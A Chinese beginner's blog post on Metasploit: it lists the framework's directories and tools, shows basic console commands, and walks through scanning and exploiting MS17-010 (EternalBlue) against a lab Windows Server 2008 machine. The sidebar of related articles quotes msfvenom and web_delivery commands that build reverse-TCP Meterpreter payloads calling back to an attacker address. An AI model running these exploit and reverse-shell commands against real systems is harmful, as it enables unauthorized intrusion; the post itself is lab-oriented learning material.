Metasploit Framewok的简单使用

最新推荐文章于 2024-05-07 10:45:00 发布
最新推荐文章于 2024-05-07 10:45:00 发布
阅读量350 收藏
点赞数
分类专栏: web 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/104462477
版权

介绍

几乎每一个玩渗透的人都会接触到metasploit framework,简称msf。这是一个渗透测试框架,用ruby语言写的,该框架集成了很多可用的exploit,比如著名的ms08_067等。你可以在这个框架下进行一系列的渗透测试,利用现有的payload,如meterpreter等进一步拿取对方的shell

metasploit模块功能介绍

config --metasploit的环境配置信息,数据库配置信息
data--后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
db--rails编译生成msf的web框架时的数据库信息
documentation--用户说明文档及开发文档
external--metasploit的一些基础扩展模块
libs--metasploit的一些基础类和第三方模块类
log--msf运行时的一些系统信息和其他信息
modules--metasploit的系统工具模块,包括预辅助模块(auxiliary),渗透模块(exploits),攻击荷载(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encoders)
msfbinscan--对bin文件进行文件偏移地址扫描
msfcli--metasploit命令行模式,可以快速调用有效的payload进行攻击,新版本的metasploit即将在2015年6月18日弃用
msfconsole--metasploit的基本命令行,集成了各种功能。
msfd--metasploit服务,非持久性服务
msfelfscan--对linux的elf文件偏移地址进行扫描
msfencode--metasploit的编码模块,可以对mepayload和shellcode进行编码输出
msfpayload--metasploit攻击荷载,用以调用不同的攻击荷载,生成和输出不同格式的shellocode,新版本的metasploit即将在2015年6月18日弃用,用msfvenmon替代。
msfmachscan--功能同msfelfscan
msfpescan--对windows的pe格式文件偏移地址进行扫描
msfrop--对windows的pe进行文件地址偏移操作,可以绕过alsr等
msfrpc--metasploit的服务端,非持久性的rpc服务
msfrpcd--持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xml进行数据传输。
msfupdate--metasploit更新模块,可以用来更新metasploit模块
msfvenom--集成了msfpayload和msfencode的功能,效率更高,即将替代msf payload和msfencode
plugins--metasploit的第三方插件接口
scripts--metasplit的常用后渗透模块,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
test--metasploit的基本测试目录
tools--额外的小工具和第三方脚本工具

在这里插入图片描述

基本的控制台命令使用

banner
查看metasploit的基本信息
在这里插入图片描述connect

这里理解成kali的nc命令,基本一致
在这里插入图片描述在这里插入图片描述
show

列出各种各样的模块,后边会经常使用

search

搜索模块和漏洞的名称,可以进行模糊匹配
在这里插入图片描述

测试

这里我以ms17_010漏洞(也就是著名的永恒之蓝)来演示Metasploit Framewok的简单使用方法

实验环境:
攻击机: kali
被攻击的计算机:windows server 2008
我看到网上说要进行这个实验要把被攻击的计算机的防火墙关掉,我试了一下,发现关不关都能成功,也不知道为什么。知道的可以给博主留下一下言。

扫描漏洞

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)
msf >set RHOSTS 192.168.11.160(设置被扫描IP)
msf >run(进行扫描,观察是否存在该漏洞)

这里表示存在此漏洞,可以进行攻击
在这里插入图片描述

漏洞攻击

msf5> use exploit/windows/smb/ms17_010_eternalblue (使用攻击模块)
msf5> set RHOSTS 192.168.11.160 (设置目标 ip)
msf5> run(开始攻击)

在这里插入图片描述在这里插入图片描述其中一些常用的命令:
show options 查看当前模块的选项
在这里插入图片描述
show targets 显示存在该漏洞的操作系统
在这里插入图片描述
从这里我们可以看出存在这个漏洞的操作系统是windows 7和windows server 2008

最后

作为一个刚开始学Metasploit Framewok的小菜鸡,还有很长的路要走啊。。。

西部壮仔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bundle 安装_mac os 安装metasploit(msf)
weixin_31047023的博客
12-12 903
安装metasploitgit clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework ./msfconsole执行上面的命令时,报如下错误,需要对bundler进行更新。[*] Bundler failed to load and returned this error: 'cann...
metasploit使用手册.xmind
10-16
metasploit神器总结,介绍基本命令、模块、信息收集、后渗透攻击等。渗透攻击步骤。主机扫描。辅助模块端口扫描。查找可用端口模块。msf>search portscan。服务扫描、辅助模块
Mac下安装Metaspoit
nameshang的博客
03-30 898
Mac下安装Metaspoit 在mac下安装的方式: 1、先去官网上下载对应的dmg文件,想要不花钱的话就可以对应的去,下载社区版本的。连接????https://osx.metasploit.com/metasploitframework-latest.pkg 2、下载完成后按照步骤安装即可 下载安装之后的配置 1、默认的下载安装位置是在/opt/metasploit-framework/bin的这个目录下面,但这个时候你总不可能每一次运行msf都跑到这个目录下去执行这样会显得效率非常的低。 2、将ms
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
weixin_51725318的博客
05-07 1157
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
上线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 9374
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
metasploit快速入门(一)安装部署
whatday的专栏
11-03 8569
目录 简介 1 在Windows上安装Metasploit 2在Linux和MacOS上安装Metasploit 3在Kali Linux上使用Metasploit 4升级Kali Linux 5构建渗透测试实验环境 6配置SSH连接 7使用SSH连接到Kali 8配置PostgreSQL数据库 9创建工作区 10使用数据库 11 使用 hosts 命令 ...
metasploit中文使用详解.pdf
08-14
### Metasploit中文使用详解 #### 一、Metasploit简介 Metasploit是一款非常知名的开源安全漏洞检测工具。作为一款免费工具,Metasploit被广泛应用于网络安全领域,特别是用于评估系统安全性的强度。该框架自2003...
metasploit使用lnk漏洞渗透测试.doc
03-18
Metasploit使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
MetaSploit终端下PostgreSQL数据库的使用.rar
12-29
在IT安全领域,渗透测试是评估系统安全性的重要手段,而MetaSploit是一个广泛使用的开源渗透测试框架。这个压缩包文件“MetaSploit终端下PostgreSQL数据库的使用.rar”显然是关于如何在MetaSploit环境中操作和利用...
Metasploit MacOs版本
08-04
在只有Mac电脑的前提下,虽然可以装虚拟机,但是执行速度略慢,所以不如直接装MSF.pmg
Metasploit(四)--Msfpayload命令
weixin_33910759的博客
08-27 1439
原文:http://www.360doc.com/content/15/0123/00/597197_442974311.shtmlmsfpayload即将在2015年6月18日弃用,用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindows msfpayload-l|greplinux ...
Metasploit 渗透测试手册第三版 第一章 Metasploit快速入门(翻译)
weixin_33845881的博客
04-10 1152
第一章 Metasploit快速入门 在本章中,我们将会学习以下内容: 1、在Windows上安装Metasploit 2、在Linux和MacOS上安装Metasploit 3、在Kali Linux中使用 Metasploit 4、使用虚拟化软件构建渗透测试实验环境 5、配置SSH连接 6、使用SSH连接Kali 7、为Metaspolit配置PostgreSQL数据库 8、创建工作区 9、使...
msf payload php,Metasploit(四)--Msfpayload命令
weixin_32304785的博客
03-11 498
msfpayload即将在2015年6月18日弃用,用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindowsmsfpayload-l|greplinuxmsfpayload-l|grepandriod列出某个平台的pyloadsmsfpayloadwindows/meterpreter/bind_t...
Mac下安装Metasploit记录
Make
07-31 1793
1、安装PostgreSQL 通过homebrew来安装,命令很简单 brew install postgresql To migrate existing data from a previous major version of PostgreSQL run: brew postgresql-upgrade-database To have launchd start postgr...
Kali玩转Metasploit 实现安全漏洞检测
热门推荐
追风筝的孩子
08-01 1万+
          Metasploit就是一个漏洞框架,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。。它的全称叫做The Metasploit Framework,简称叫做MSFMetasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 !!!Metas...
metasploit渗透测试(一)在 Mac 安装 Metasploit-framework
章鱼烧的博客
10-28 5319
Mac 安装 metasploit 渗透测试工具
msfvenom 简单利用记录
sinat_41380394的博客
08-05 451
msfvenom常用参数大概就是-p (payload) ,-e(encoder),-i(encoder次数),-o(输出路径),-f(输出文件类型)。   简单生成一个反弹tcp的exe文件,使用编码方式是xor: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.120 LPORT=4444 -e xor -...
Metasploit入门使用手册
m0_67392126的博客
03-21 2069
Metasploit基础 Metasploit使用的数据库是posetpresql,在msf5之前启动的话需要安装数据库格式化数据库,设置用户和密码去进行连接,而在msf5之后不需要在这样操作,只需在kali的命令行中使用msfdb init就可以初始化并开启msf的数据库,然后在输入msfconsole就可以启动msf,进入之后我们可以使用db_status来进行查看连接数据库的状态。除此在外我们还可以使用kage实现界面话。 1.msf目录结构 在kali当中默认安装,文件路径是在/usr/sha
Metasploit中文使用指南:搭建与应用解析
"metasploit中文使用详解.pdf" Metasploit是一个开源的安全漏洞利用框架,广泛用于渗透测试和系统安全评估。它包含了丰富的exploits(攻击脚本)、payloads(有效载荷)、encoders(编码器)和nops(无操作指令),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值